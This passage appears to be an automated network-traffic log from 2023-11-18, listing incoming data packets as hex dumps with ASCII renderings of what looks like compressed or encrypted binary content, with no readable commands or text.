2023-11-18 09:02:39 UTC	920	IN	Data Raw: cb 48 fd 51 e6 c5 bb 28 f8 45 cb f3 59 6e 90 f2 5b 8c d6 7d 84 c4 85 fb 10 89 1e 86 c4 3d 24 4c 2f 69 09 ed 94 c3 c7 8e a1 bf 30 72 0d c6 38 31 10 e1 30 f4 9b 60 83 7f 2e 4c 4f 6b 8d 99 f0 13 89 71 27 25 7c 2d fd 89 1a 38 e7 27 be 67 ad bf c2 61 b1 38 26 5d 2e 69 64 fc 69 14 93 b0 4f 71 90 e8 d5 8b f8 54 16 79 9c 15 68 5f e1 d4 89 48 85 da bb 4d bb 24 71 33 30 9a f6 73 20 6e c7 3e 51 dd df c9 e6 9e 6a 88 03 37 83 78 d3 74 a8 6d e0 07 69 9b fc 13 94 2c 39 f4 86 19 84 0b a2 e4 db dc ac fe 70 28 16 83 cd 78 f0 6d c6 f2 a6 b1 ee 35 b5 0f 88 9e c4 4f 6b b3 25 62 0f d1 cf 8f c6 19 d2 f4 9f 2c 56 95 2a 87 51 ce 21 12 42 ba f1 ce 63 a2 61 d3 d7 92 d8 6c 9e 03 17 ba 5d 6a a1 c7 a5 66 b9 20 a8 48 73 f0 47 13 63 81 1e 4c 46 15 63 76 f4 9c 4b 4c 2b 0c a6 bf 2c 71 37 Data Ascii: HQ(EYn[}=$L/i0r810`.LOkq'%\|-8'ga8&].idiOqTyh_HM$q30s n>Qj7xtmi,9p(xm5Ok%b,V*Q!Bcal]jf HsGcLFcvKL+,q7
2023-11-18 09:02:39 UTC	922	IN	Data Raw: 6a ec 87 5e 6e cc f5 57 33 e6 f1 1c 45 b1 84 f3 66 d8 dd 12 06 a1 10 44 16 b5 aa cf 00 2b 27 29 e6 a1 58 c0 4f 90 14 96 13 8e 05 d2 75 fd 3d f2 d4 ec 03 b1 05 a9 f7 ff 22 37 b3 fa 93 28 06 46 66 e4 35 08 4b f6 26 98 5a 45 0a 0a 9b be 97 c4 43 d6 06 a7 41 57 dd 32 19 7d d1 03 f8 82 c1 6d b4 0c e5 fe 4e 39 74 3e d4 a1 1b b4 19 64 cd 94 0e 11 4a 40 da fe 15 0c fb c7 a4 c3 d1 a6 83 84 45 8f 5e ea 31 cf 1d 41 36 44 8f 48 b7 62 b4 1b b4 99 c3 8d fe 18 46 4e 92 36 c6 63 23 e9 4b 2d 92 ce 21 92 9e ab e8 8b b1 53 5b f5 7e 81 34 f5 08 9b 8b ff 84 bd fe 0f 7d 21 0a 74 dd 68 27 8e cb 10 8a 3d 39 04 e0 58 1c a0 83 dc 3f c8 2b ef df 23 62 54 a1 da 23 ce d9 7d b4 8f b4 1f 3e fe 1a 26 c1 07 60 20 4d 97 ec a1 8b 2d c8 20 d8 5f f8 17 f5 d8 e2 f7 c0 54 de 75 82 c3 59 73 1e Data Ascii: j^nW3EfD+')XOu="7(Ff5K&ZECAW2}mN9t>dJ@E^1A6DHbFN6c#K-!S[~4}!th'=9X?+#bT#}>&` M- _TuYs
2023-11-18 09:02:39 UTC	923	IN	Data Raw: e7 81 e6 a9 7a 17 69 9e 6e e9 86 c5 47 57 fd 4a d9 8f 08 5d f7 8a d1 ad 3c 10 c6 70 c0 8c 2b 06 b3 04 0e 46 04 39 bc 05 c3 d1 f7 0d 8c d5 06 45 df e4 e0 ec 4e 06 07 ea bf a9 83 12 47 74 d7 f8 a4 4e b2 e6 41 69 3e 3a 1c af fc 93 a2 af 73 4f 86 f3 ba 2b e2 eb 4c 0e 77 6e d7 87 2d 25 45 d8 cb a8 16 4b d4 80 d1 ae 92 2e 38 d1 d7 a1 77 4f 63 6f ba 4c 64 fe 11 90 8b d8 d6 0b 4e 0e e8 9e 91 e2 9a c8 6b a8 71 59 0c 6e 53 7c 17 b3 3c 61 0f f7 34 df c3 5d f7 1f 62 81 97 c0 6f 33 2e 03 97 c3 8d 37 78 85 89 bc e0 55 c9 e4 1f 11 f2 3c 55 b2 db 34 53 ac cc d2 cd 2b 17 72 f8 3e ab 42 71 59 9c df e2 fa e0 6e 07 a5 a1 d9 2b 48 a5 99 e3 2c 41 47 39 92 a0 d8 a6 66 ee 4e da ca c1 b9 26 ad ab 54 a3 9d 97 89 b6 5a 3d 28 ff 85 62 e8 ec 63 df ab dd 80 42 bb 5c 0f 97 9a e9 8b 0d Data Ascii: zinGWJ]<p+F9ENGtNAi>:sO+Lwn-%EK.8wOcoLdNkqYnS\|<a4]bo3.7xU<U4S+r>BqYn+H,AG9fN&TZ=(bcB\
2023-11-18 09:02:39 UTC	924	IN	Data Raw: 0d 6b 3d dc 7c ec 64 38 eb ab 4c d7 da ce 16 1a 9d 68 c2 25 87 e7 b2 1a e6 7f 2d e4 ba 04 39 e4 20 63 ae 97 79 50 17 0f fd e6 78 f8 d5 5c 70 c0 ad 1e ee 21 d7 fd 40 ad 66 45 a6 76 c0 09 5a a4 42 a9 06 3e 5c 4d d2 ac b1 f8 c2 14 4a f6 66 61 54 4b 77 96 b6 19 2f 78 64 79 d3 da d2 f6 2d 73 ca e1 53 25 32 97 d0 53 2f 76 68 22 db 36 5c 5c 24 69 43 a5 da d2 1e 62 f0 82 da d2 54 31 98 55 5b 9a 22 06 cf ac 2d 95 c4 60 46 6d a9 53 0c f6 ab 2d 75 88 41 4f 6d a9 28 06 7b d6 a6 32 59 f7 2e 07 9c 37 84 4c 88 13 36 fd c0 aa a0 79 1e 59 5e 31 f9 08 a0 6a e0 07 64 7d e2 73 d8 b0 1f bc 40 2f 73 39 cb d0 f9 ee 24 d3 72 c5 0c 24 c6 71 5c c8 0b 76 c0 94 af 56 6e 8f 04 28 c2 a7 60 db 19 a3 30 9b c7 e6 c3 14 9a 0f d5 8e b8 f4 ae 9b f1 7c 25 e3 af 33 28 f9 6a 9e 0c a7 a9 7a 0f Data Ascii: k=\|d8Lh%-9 cyPx\p!@fEvZB>\MJfaTKw/xdy-sS%2S/vh"6\\$iCbT1U["-`FmS-uAOm({2Y.7L6yY^1jd}s@/s9$r$q\vVn(`0\|%3(jz
2023-11-18 09:02:39 UTC	926	IN	Data Raw: 6f 4b 69 ed 2b 84 58 5b f4 08 9e 6f 2f 53 9e e7 28 cf eb f4 f6 b8 4d 09 4b 97 94 cc 67 8c 53 16 66 9d 8d 2e a5 f0 c9 dc 35 0e 43 23 23 80 c9 e6 af 45 f0 40 7f f7 b7 50 bf b7 b0 df 21 cf 83 5f 42 68 70 2f 30 35 aa 17 48 ff 15 5a d5 53 10 86 40 c7 e5 30 e8 d6 23 21 74 99 a5 58 fc 01 e3 bf 6f a1 fb 62 3d db cf 67 88 ab cf 85 28 13 02 ad cc 53 b8 ae 20 e7 62 fa 05 83 2d a1 95 44 3a be a8 e7 16 d2 27 90 bf 33 e9 d3 a4 19 ff 38 0e eb fc 9c 89 df 77 4c 8b 9e 42 7e 04 43 fe 82 80 0d 61 80 0d 79 01 21 39 b9 57 17 48 6e 7a 8b bb 88 b2 b5 8b a0 19 f4 7f 0f 4d 46 77 d0 84 4d ff 23 a0 8c f0 83 3d bb 80 f0 cb db 04 c2 6c 0e 82 b0 fa b2 df 09 42 6e 57 10 b8 8c 3f a9 e1 65 0e c2 77 1d d3 38 a5 d5 ae 47 0a 60 28 d1 7a e0 8e e5 65 32 59 5d e1 c4 18 cb 01 b9 17 f8 c8 8a 07 Data Ascii: oKi+X[o/S(MKgSf.5C##E@P!_Bhp/05HZS@0#!tXob=g(S b-D:'38wLB~Cay!9WHnzMFwM#=lBnW?ew8G`(ze2Y]
2023-11-18 09:02:39 UTC	927	IN	Data Raw: ab 63 a4 90 cc 53 58 65 2b 4c f7 27 92 b1 b0 d9 3c 6c 76 6e 26 ea cd 26 10 8a 32 09 e0 07 b3 6d f6 a3 f0 7d f5 5a 09 e2 a0 d4 1d 44 65 7d ae 6f 2b 5b 1e a6 44 4a 06 b8 9d 8c f7 0e a2 fe 1f 3a e4 df 2c d7 c1 2d 04 5a 33 ac b9 78 43 d0 3b f2 3f 8f b0 49 5e 0e f1 89 23 e5 31 8e e4 d6 90 64 f0 e5 90 01 09 5e a8 da 4f be c6 03 cb e7 af 47 48 6b 71 29 3e f5 20 ba 52 21 e8 39 0a bf 53 0d a1 87 58 18 af 9e 9e 82 c3 66 1f af 4b d9 3f ba 4b e1 40 a4 b8 37 01 8a 83 56 a2 94 00 c2 41 0d 53 de 7b d0 03 34 5c 9b 0f 1d e2 e2 00 2c da da c7 be ad 22 fb 14 29 f8 80 0b 03 b0 c2 31 52 02 be 10 03 ff 15 05 4e 07 a2 87 e8 42 9e 19 ac 27 b0 0c a3 a7 65 0d eb 8f b9 bc 47 ca d9 aa ae 05 52 04 00 64 f3 cc 5f b5 c3 be c6 a6 af d9 4a 0e ab 38 63 1e 59 e0 cd cb 36 26 8d 4d ff f5 a4 Data Ascii: cSXe+L'<lvn&&2m}ZDe}o+[DJ:,-Z3xC;?I^#1d^OGHkq)> R!9SXfK?K@7VAS{4\,")1RNB'eGRd_J8cY6&M
2023-11-18 09:02:39 UTC	928	IN	Data Raw: 67 19 99 be 4c b1 c3 4b ed e5 1b 05 3c 4f 08 42 c9 3d f8 8a 04 1b 47 25 79 6f d1 83 67 ba 49 4c 02 3a 2f 0e 74 cb 3f 29 cf 60 5b 63 5e 5b 1d 2f f0 f4 d3 71 1b 62 b6 d0 b4 4b f2 c3 b5 b0 0f bc c8 ef ae b2 af 0b cf f1 22 43 1c 78 cb 41 ae 87 ed f7 f3 e4 90 c7 41 21 3d 8e 9f 24 87 47 70 ee 7a 1e 4c 4d 08 21 16 b9 3a a6 95 e4 54 a9 87 25 79 01 5c 17 a8 fe f7 18 28 c9 bc e3 d4 66 c9 ff ce cc 5f a3 45 71 3e e1 10 13 e7 f7 fd 9c 2f 3c 9d c4 17 5c 6c 77 17 1d 4a f6 5f d0 35 3b 8c c7 5e 25 18 db 44 cb 27 3f 37 7b 33 68 17 d5 8f b8 1c 07 f1 15 21 76 d1 94 fa 93 96 39 e4 d0 45 f0 ba aa 4a 9a 0c 59 27 6b 55 62 67 74 40 62 3c dc 21 27 e0 8b 3f 0a 20 92 db 21 bb e3 59 87 65 a1 f0 f3 2b 92 15 8d e7 3b f6 6c c6 1a c6 38 18 7c d4 46 d7 b4 2e 78 8f df d7 4b 27 91 00 e0 64 Data Ascii: gLK<OB=G%yogIL:/t?)`[c^[/qbK"CxAA!=$GpzLM!:T%y\(f_Eq>/<\lwJ_5;^%D'?7{3h!v9EJY'kUbgt@b<!'? !Ye+;l8\|F.xK'd
2023-11-18 09:02:39 UTC	930	IN	Data Raw: 45 f2 31 35 2c 5b 64 81 25 93 2f e5 99 14 7b a6 91 98 69 be 25 dc cf e6 99 62 a8 58 e0 81 8b ab c8 04 5c e7 69 df 08 5d fb d7 60 eb df 68 9e 6f 1d 9d 2b af e7 26 8e 14 6d 99 4c 49 3d 3c cb e3 dd c4 47 fe e5 05 4a ab 31 8d 0c 33 94 84 b0 bf 12 96 9d 3b 51 6d 15 f1 e4 02 ae 29 2c 51 f2 d5 98 53 0e 87 f9 05 aa 13 5f c0 41 91 0a 79 bc a7 cd cf 4a 56 dc 2a cd 85 8b b4 be 1e 47 d0 b4 74 80 b0 da f3 37 2c 35 c3 a9 70 ba 39 7a 82 19 13 b2 cf 18 46 db 13 97 38 70 e6 18 7f 49 6c b7 f2 59 d0 ef b7 2f 36 fd 93 8c 6e e8 b4 bb fa 3c 4b 70 06 8e 03 4e 5f b2 8c c7 75 66 c4 80 66 fd ea 91 39 b3 7b c8 6f 2d 98 c8 2a 69 69 b0 db 9f c1 cd f4 12 63 b9 d7 ba fd d7 b8 03 29 fd 1b d5 cd d6 ad 3f 0d d1 75 6f 5b 6b 05 9e ff 90 fd 8a 3d 02 e4 96 02 a7 00 b6 29 64 a7 60 a5 bb f2 7b Data Ascii: E15,[d%/{i%bX\i]`ho+&mLI=<GJ13;Qm),QS_AyJVGt7,5p9zF8pIlY/6n<KpN_uff9{o-iic)?uo[k=)d`{
2023-11-18 09:02:39 UTC	931	IN	Data Raw: d8 70 6d b7 b3 bc ba 2a ce f2 5c 4f 49 34 24 6f e1 97 ba 71 29 26 19 cc e1 95 c3 4c 09 f2 8d cd 13 09 75 e4 f3 3a 36 c0 42 84 6f 44 9e 81 02 bc d7 f0 30 1b 14 43 1c d2 89 64 c9 c3 59 b9 5e b4 d5 00 b9 32 59 59 0d cb a2 73 94 d3 6c fd c8 11 a2 3c 21 ba 8f 3f d5 e2 75 98 5f c3 1b a8 e4 3a c8 65 d0 d4 17 bf 63 e6 82 2f d1 f5 14 ca cb f3 a7 24 b6 5b d4 0d db bd f1 71 b4 c4 d1 8e 00 65 cb a1 4e 91 ae ce 69 7d 9c a8 67 2a 5f ce b6 3f 1e bf 43 e2 86 23 a8 05 ce b7 07 ce 8a be 7f 9c 2a e8 0d 21 3e 3e 7a 44 12 b8 21 a7 d6 62 2c 7e 84 36 36 5f 8b 44 1c 5f 73 c9 4c 85 5c 13 14 8f ed 70 0d c7 b1 87 20 e1 66 40 1d 4b 68 c9 06 a1 8e 18 5a 21 4a d2 ef b0 82 7c 76 8c 93 08 61 10 00 44 7b ab d2 1a be 35 10 1a a9 0e de 2d fe 77 98 53 0b b2 7e fa b6 18 4b e5 59 ef 2a be 57 Data Ascii: pm\OI4$oq)&Lu:6BoD0CdY^2YYsl<!?u_:ec/$[qeNi}g_?C#!>>zD!b,~66_D_sL\p f@KhZ!J\|vaD{5-wS~KYW
2023-11-18 09:02:39 UTC	932	IN	Data Raw: e5 8e 71 e9 63 dd da 18 73 b1 9c ed d1 2e d2 ef 92 b4 99 92 7e 97 4b 9b e9 d2 ef 72 6b 33 dd fa 5d 1e 6d a6 47 bf cb ab cd f4 ea 77 a5 6b 33 d3 f5 ab 32 b4 e1 7c b1 d4 6f ca 8d 5c 93 a9 fd 31 53 2f 97 b4 e1 92 5e ee d2 86 bb f4 72 b7 36 dc ad 97 7b b4 e1 1e bd dc ab 0d f7 ea e5 e9 da f0 74 bd 30 43 2b e2 8b e5 51 2e 19 ad 67 5d 8a 36 f2 97 6f fa 74 2f 59 d9 51 52 f9 00 a2 64 1d dc d1 c1 ba 78 f3 fd 24 c7 35 41 3d f7 32 46 bc 1a 14 f5 d1 a5 20 45 fd b5 81 eb 6b d0 f7 b9 4a 91 e0 76 8e d0 b3 a0 2a 32 2e 51 3b 4e 9b dd 83 c9 30 e9 b7 77 4e 63 12 10 78 0f 6b 0b 40 35 83 f0 f1 f7 5c 31 f1 bd 32 e9 bd 22 e1 5d bd 1f 19 ba b6 60 43 f7 9f 37 77 ff f9 3d eb b3 75 fe be 80 4b 02 4c e8 70 ad 16 bb bb 8f 7f 4a 64 82 92 61 c6 bf b0 5d 91 c8 26 3c 58 d8 03 d6 40 ef 0e Data Ascii: qcs.~Krk3]mGwk32\|o\1S/^r6{t0C+Q.g]6ot/YQRdx$5A=2F EkJv*2.Q;N0wNcxk@5\12"]`C7w=uKLpJda]&<X@
2023-11-18 09:02:39 UTC	934	IN	Data Raw: d9 18 bd 2d 6e 19 15 fc c7 32 47 e0 6f f6 12 29 bc c4 f5 58 22 70 8e 3d 2d 95 a7 5d 41 b5 85 a7 c5 6c f7 c9 cb 31 9b be d1 5e 4a e4 a5 5c 54 e3 27 d0 0f dc 84 92 9d 87 95 cf c1 f3 ed 52 a8 f6 4c f0 75 6e 8c ae ea a4 78 52 56 be 7e 3c df 6a cc 17 08 d9 d3 7e e4 69 4b a9 8e d0 a4 58 2c 66 4f ff 09 63 10 c1 f4 9b 56 27 09 49 f6 a6 c9 e6 95 77 83 70 72 76 6b 71 96 d3 34 2f b6 db 55 fe 80 0b 6d 1e d8 55 b6 e0 7d 1a 53 ee 72 a0 1d 59 f0 7d bd 38 0b 06 6a 21 99 93 e9 0f 1b b8 52 04 ce 33 cd 09 0a d5 8e 58 60 22 cb 05 c2 cc 72 3c 57 35 28 5c da 33 51 0d f1 b7 cc 11 bc 17 c2 c5 02 43 c1 8b d6 81 5a bc e6 8e 46 e8 26 34 9b 39 87 63 95 f9 d0 bc 23 f8 02 5e 5b 19 bd 2a 86 f1 fc 37 8b 5a 71 96 3d af 79 1f 87 c3 43 d6 6d f5 08 c1 96 e0 16 02 4b 0e c3 75 2b d8 e9 68 2a Data Ascii: -n2Go)X"p=-]Al1^J\T'RLunxRV~<j~iKX,fOcV'Iwprvkq4/UmU}SrY}8j!R3X`"r<W5(\3QCZF&49c#^[7Zq=yCmKu+h
2023-11-18 09:02:39 UTC	935	IN	Data Raw: 3b 84 f6 45 89 fe 17 b3 93 ca a6 9e a0 ec ae c9 0e cb 03 f1 f5 80 24 98 48 8e 0e 4e f4 6f 9c f9 3b eb 6b 60 f5 d9 ef 3d aa 66 e5 da 37 c5 fd 72 6e 38 99 6b 4b ac 9a 4a 4e 50 53 29 d4 f4 06 48 fb 35 f7 26 1c b7 37 24 cb fb 40 1d 85 26 e0 d0 91 e5 7b 88 32 e0 aa 1c ad 45 5e 55 e8 52 77 39 27 e3 3d 0f 2b 6c d2 b6 49 19 4a 80 7c 48 02 77 60 dc 81 bb 71 04 27 59 b4 e0 fc 9f b4 c0 56 91 63 54 e2 22 a4 03 6e 52 d5 31 13 be cd 3b c3 c4 ed b8 bb e3 b8 6d 77 f1 7d d7 41 28 bd f2 6e 4e 25 15 4a 0e 9f 33 57 26 78 98 35 18 2d 33 b9 f3 74 63 20 5d 3f 85 a2 36 48 c6 9f 66 a2 e6 02 be 6f 0d 36 41 23 07 66 a2 d1 fc 1b c6 f0 7b ec f2 3e 9f 4f 18 e1 a1 46 a9 b4 e6 11 36 c6 78 51 8e 6f 0b c4 05 03 8c 35 89 74 78 b5 c6 16 67 1e 6a 4e bb 1b dd 88 b4 16 e3 9f 33 89 f0 4f 15 ad Data Ascii: ;E$HNo;k`=f7rn8kKJNPS)H5&7$@&{2E^URw9'=+lIJ\|Hw`q'YVcT"nR1;mw}A(nN%J3W&x5-3tc ]?6Hfo6A#f{>OF6xQo5txgjN3O
2023-11-18 09:02:39 UTC	936	IN	Data Raw: 54 51 1b 55 f4 79 bc a2 36 aa a8 8a c8 9e 5f 97 ed aa 65 cb 83 19 36 eb 12 b6 60 e9 0f e0 6c 33 cf 29 d6 a0 2f 26 50 a2 5d 24 d0 97 af a7 90 38 1f 69 6d 6b 4e 87 06 d7 2b 7b 12 67 9f 6d ee 69 46 b4 96 df 9b 45 e4 83 db 81 d5 c7 6d f7 77 13 58 f8 1d f7 2a d4 5f 7c ef 41 ef f9 e6 fb 63 9d f8 9e 67 be 0f a7 f7 5c f3 fd f8 71 3c 27 c8 03 0e b3 e4 0e 49 38 81 7f 50 b5 32 09 6c 15 f4 61 c8 3c 01 0b f1 f3 a9 7c 6e ff ec e2 37 07 49 c6 a0 3b 4c 59 d2 cf dd 0a e0 57 1f 00 2c e9 9f c0 8b af 80 fb b9 e9 24 5c 6b 6e 3a e2 52 8f 38 e5 47 9a e6 1f 41 5b fb 47 9a 43 1f 05 7a f1 13 c8 2c 58 90 9c 7a a9 4b cd 77 c8 a1 cf f8 5a e0 a5 39 eb 9e c8 57 6b 8d f3 d6 db 6d 96 30 a5 53 c9 ef 0c 80 05 29 6e d1 9f 24 b0 ed 97 fc 03 02 63 48 e2 f8 84 f1 ce b8 29 84 1c 0e a5 08 42 dc Data Ascii: TQUy6_e6`l3)/&P]$8imkN+{gmiFEmwX*_\|Acg\q<'I8P2la<\|n7I;LYW,$\kn:R8GA[GCz,XzKwZ9Wkm0S)n$cH)B
2023-11-18 09:02:39 UTC	938	IN	Data Raw: e6 04 1a be cc a2 61 2e df 26 d3 f1 e7 6f 23 1d 3f 6e a6 13 3d 6b c6 ee 5b 25 33 1e 08 54 9f 7b f5 61 90 4a bd 6c da 1a fd 6f 46 1b d8 be cf c3 24 66 0f 6e 9c d7 dc 1e 14 d5 18 ed 3f db e3 4f a0 4a 34 4f 88 c3 d9 2a e1 2e cf c8 9d c8 cf 5f 86 47 0a bd 9a 13 07 76 a1 ea 12 91 2d b1 e7 89 23 59 a3 aa 79 16 df aa 0a 9c 23 19 7f 87 82 aa 9b 76 70 43 d4 0d 59 ac 8b f1 38 ae 9e cb 38 53 da d1 90 68 11 ff 17 1b 43 0c dd c8 84 cb 8d a8 bf f3 14 fd 8e fc 55 37 4a a4 4b b3 3b 99 41 01 e3 6b 26 7d 45 e7 98 71 be 48 5f 57 02 f6 64 72 08 83 d5 8c f3 46 56 6c b6 e8 45 77 aa 2d 78 2d 5c 2f 18 ee e2 7d ad c5 7b 4c b6 76 d2 04 08 0c b1 0f 5e 2d af a3 e2 5f 30 7e c2 38 48 f9 c5 64 b2 3b 6c cd eb c5 1d 90 e3 86 9b 20 07 7a bc b6 16 a3 e9 81 ff 40 70 31 3f 20 b6 d3 2b d7 a7 Data Ascii: a.&o#?n=k[%3T{aJloF$fn?OJ4O*._Gv-#Yy#vpCY88ShCU7JK;Ak&}EqH_WdrFVlEw-x-\/}{Lv^-_0~8Hd;l z@p1? +
2023-11-18 09:02:39 UTC	939	IN	Data Raw: f5 da d3 47 e6 84 b7 04 77 f3 de 84 2f 42 25 65 61 78 6b f0 23 de a9 30 04 b0 d6 ef a8 0a ef 0d be c5 fb 16 46 55 e6 c8 29 ac e0 72 de c5 f0 1f b0 60 0d 2b f8 78 42 4f c3 fd 20 e1 d5 06 74 34 92 c3 28 cf da fb 1d 76 41 fa a2 17 29 4a 6c 78 1c a6 db b0 10 a6 a0 4c ab f9 3a 8d e1 93 60 3e 6b 67 24 74 a6 61 b4 5e 41 f7 a5 86 b7 04 46 30 a2 0a 8c f4 ed 64 bb b4 e0 50 fd a4 c8 50 6f 76 73 d3 11 c7 d4 ad ef bf f7 de 7b 6a b3 a8 1e 71 cd cb 8e 64 3c 1c 91 1e 8f 9f df a5 b3 f9 de 43 1f 27 85 77 06 cf 82 3c 8d 5e f5 48 5a d0 40 22 02 7b d2 a1 5e df d6 f6 77 ac fc eb f0 fc 4d d4 76 c4 ed b4 c0 f4 cf a5 35 e0 92 89 91 28 76 db bc 1c 89 be 72 d8 4c 2f 81 5b 66 40 ab de d7 41 87 a1 57 5d 4d a3 98 e2 b0 78 f1 b2 3d 84 2f fc 66 e4 8e 30 55 f3 2b 45 2c 62 6a 42 8c 4f 2b Data Ascii: Gw/B%eaxk#0FU)r`+xBO t4(vA)JlxL:`>kg$ta^AF0dPPovs{jqd<C'w<^HZ@"{^wMv5(vrL/[f@AW]Mx=/f0U+E,bjBO+
2023-11-18 09:02:39 UTC	940	IN	Data Raw: 5f 03 eb 7f ab d1 8f 3d 45 4a 7a 38 86 c0 9d 84 f2 c2 73 c9 3a da 03 33 18 00 3e 6e 9e 26 4a 24 08 b5 5e c5 c3 46 c2 01 d1 c2 26 6e 89 68 6e 47 9b 8e c3 c6 9f ee db 45 73 19 be d3 f6 f3 e9 1a 54 63 7d cb bf 8a 4d 23 87 59 b4 d0 a8 c5 a3 57 81 7d 04 7c 7d eb 20 1d 89 5d 8f d1 93 70 e5 c0 f8 2f a5 e4 61 e4 7c 88 89 bf 13 68 3f 9b fa 10 6a 6a 81 ba 8c 29 94 ee f9 3e 09 ef 66 cc 8d ed 36 bc c3 fa 85 e7 57 07 75 8c c9 14 70 47 f8 58 3f 0c 14 41 88 e3 43 3b 74 fe 06 40 b8 b6 2f 49 4e dd 96 d4 4e 1f b1 6b 3b 4b d9 ec 6f 7f d2 e8 3b 3c 31 5e 0a 5c 02 02 7b 9b 37 e9 74 7c a2 be 02 37 18 57 e0 cd a7 17 32 89 08 2c 04 61 63 f3 39 dd 53 96 0b 9b be e7 20 f3 ab 06 df f2 dc 82 b3 fc 20 2b 20 ca e1 b3 f1 3c e7 0a eb 1e 8e 50 16 67 c4 7a 0f a4 7c f3 5e 02 d6 bf 93 af 30 Data Ascii: _=EJz8s:3>n&J$^F&nhnGEsTc}M#YW}\|} ]p/a\|h?jj)>f6WupGX?AC;t@/INNk;Ko;<1^\{7t\|7W2,ac9S + <Pgz\|^0
2023-11-18 09:02:39 UTC	942	IN	Data Raw: 86 e5 00 0c 81 d7 ff 05 5b bb c1 3d 05 28 48 2b 72 33 e4 85 1b 03 4e ad d2 c3 d0 ea 41 49 75 8a 5b 1b e6 69 1d 46 7b 87 61 38 20 80 02 0c 10 c5 32 4d 60 63 ea d5 f2 d9 5f 28 32 51 cb 57 37 e4 26 ea 0b 6f 90 60 d4 36 76 52 bb 72 08 0c 70 92 db ee 49 6d 73 39 c5 f5 bf 60 88 de 47 7c 9d ad ce 6c f9 f1 9a bc 28 fa e9 71 ea 28 6b c4 cb 07 c6 5e 27 2b 8e f9 fc 1b 49 9b eb e1 ed f4 84 76 86 79 d0 05 07 94 f6 8d 81 1e c8 0b 2a dd 56 9f 51 84 8a 4a 7c 41 20 3c 86 c0 54 11 9a 42 3c 7a a0 2f 9f 41 30 73 50 43 41 8d d7 79 58 af 9c 00 41 89 02 61 be bc da 14 8f 36 cc cd 2b e3 b0 e0 d2 cb f1 f3 57 5e 9f 1c 7a ea 78 2c 96 5c 67 4f aa 93 c7 6e 71 ff af ba a3 e3 41 20 60 29 18 3c 86 c7 a7 30 ee 28 40 35 28 1a 59 b7 18 c6 60 7c ab 9c 79 78 9a 51 7d 09 ee b5 5f 78 1d 94 eb Data Ascii: [=(H+r3NAIu[iF{a8 2M`c_(2QW7&o`6vRrpIms9`G\|l(q(k^'+Ivy*VQJ\|A <TB<z/A0sPCAyXAa6+W^zx,\gOnqA `)<0(@5(Y`\|yxQ}_x
2023-11-18 09:02:39 UTC	943	IN	Data Raw: 19 27 ca 2b 0b c5 10 c3 a2 8b 54 6d 39 05 e7 07 9b 54 96 24 82 bf 2f 57 77 83 29 1b e8 2e 72 4c 35 ad e9 c5 cb 7e cb f9 6f 09 ff 85 90 8c 82 bc d2 e9 3b 08 f3 af 59 fd fa 2b f5 87 a1 b5 47 fa cb 75 68 47 53 f9 71 ed 11 8f 5c b7 5c a0 28 1a 63 9d 28 fb 17 a4 c8 a1 95 a4 87 44 a7 b3 82 41 c1 5e f0 2c 52 4c 55 9d fc 70 f5 7c 46 cd 83 23 53 c0 63 3e 4f 6b 87 fd c0 9d 12 d7 dd ba 4c 75 9b f8 10 aa c6 7b d4 d6 5c c2 76 76 93 f4 c1 6a 0b 4c f3 6d 70 5a c5 c0 0a 35 06 06 ae 11 3d 82 3b 52 b9 ab f6 c8 e9 b3 d3 e4 17 3e 92 17 38 f1 32 fb 62 91 b5 c5 90 b9 1b e2 80 a8 1b aa e3 e3 ba e6 e8 00 51 80 9c 6a 19 c5 1b 6c 11 d5 4d 0c 75 ce e8 69 40 ee 65 10 5a 00 4c ca 60 3b 5d 08 4c 01 5c 4e 07 36 b1 41 2a 0c dc af 97 79 31 2c 49 85 52 02 49 c3 cd a4 12 39 34 1d 4b a7 f3 Data Ascii: '+Tm9T$/Ww).rL5~o;Y+GuhGSq\\(c(DA^,RLUp\|F#Sc>OkLu{\vvjLmpZ5=;R>82bQjlMui@eZL`;]L\N6A*y1,IRI94K
2023-11-18 09:02:39 UTC	944	IN	Data Raw: 2d f6 af 32 0b 44 b5 30 58 57 4c 5b 44 7c aa c1 44 75 59 58 44 9e 7e 9e f6 e2 57 d8 a6 1d 4e 25 f9 c0 73 6b 18 ed fe ad 68 6f 1c b7 57 c7 ed b5 40 89 67 d6 88 f6 0a a8 3d bb 6f c7 0a ce 75 34 1c 48 87 2e 36 88 c8 6e 88 34 d6 b0 ef ee b8 30 d6 70 f8 0f e4 47 22 9c e9 11 60 85 33 dd 46 48 38 10 30 c5 75 16 0d 22 f2 19 da b1 c8 13 72 37 5d 5a 8c 26 7d c6 41 cc c7 5b cf 78 2f 39 97 70 5f c9 d2 10 2b ab c6 c7 08 30 b4 15 13 ce ac 82 76 dd fc b9 09 5e 54 80 97 0a 4a a6 01 ca b7 00 65 87 87 41 19 60 01 65 c9 60 01 4a 8d 00 05 8d cc 85 33 6b 3a 01 a5 ed 12 a0 cc f5 7c 7b 50 46 09 50 02 69 09 50 ba 09 50 60 52 bb d5 e7 e2 24 3c 93 02 81 b4 b8 73 08 da 07 7e 7b 08 36 0f 64 08 ce 48 09 08 16 0e 22 53 a7 05 81 1d 06 04 75 29 10 e4 5e 02 82 d9 0c c1 b0 6f 03 c1 b5 f4 Data Ascii: -2D0XWL[D\|DuYXD~WN%skhoW@g=ou4H.6n40pG"`3FH80u"r7]Z&}A[x/9p_+0v^TJeA`e`J3k:\|{PFPiPP`R$<s~{6dH"Su)^o
2023-11-18 09:02:39 UTC	946	IN	Data Raw: 48 1e d8 5a f7 a1 d4 b0 d7 37 63 50 3c 7e 21 9e 8b 56 17 d4 4a a7 56 7e e7 19 6f 91 d3 11 38 cc ec 46 e7 27 29 44 90 65 62 64 c7 5b 64 85 06 0f 90 4d f4 0f b9 e0 86 ec f1 66 1b 63 0b 06 a5 63 da 22 22 52 d8 1f 03 60 ba 0b 22 05 43 e1 08 7c 01 67 44 2e 89 05 26 80 68 78 90 11 89 42 3f 80 bf 02 af 71 b5 42 dc f8 28 b0 b8 a2 90 03 25 2b 0a 38 e0 8d 4f 20 cb 48 cf a1 a5 b3 d7 1b e5 3a 83 10 bc e5 50 3a 4e 49 16 5f 7c c3 70 8b dc 9e 8d 9c d0 e2 e3 30 8e bf ff cc 3c d7 d5 42 4f 7c 42 0d 4c e1 34 94 18 55 a6 92 57 a9 6a a7 6f 32 11 ce aa f3 7c 37 a2 d7 90 40 b5 cb 57 49 14 c4 b1 f9 be 32 6d 3c f9 89 82 0b 0d 2d b3 55 17 c0 77 68 27 7b 58 a3 bd c5 1f 4e 6b b4 ff ab 9a 26 28 f9 e1 eb 18 cd b9 8e b0 1a ba 27 b7 a7 95 9e f0 a9 81 f8 fc 3b c8 94 88 bd 65 cb 27 e9 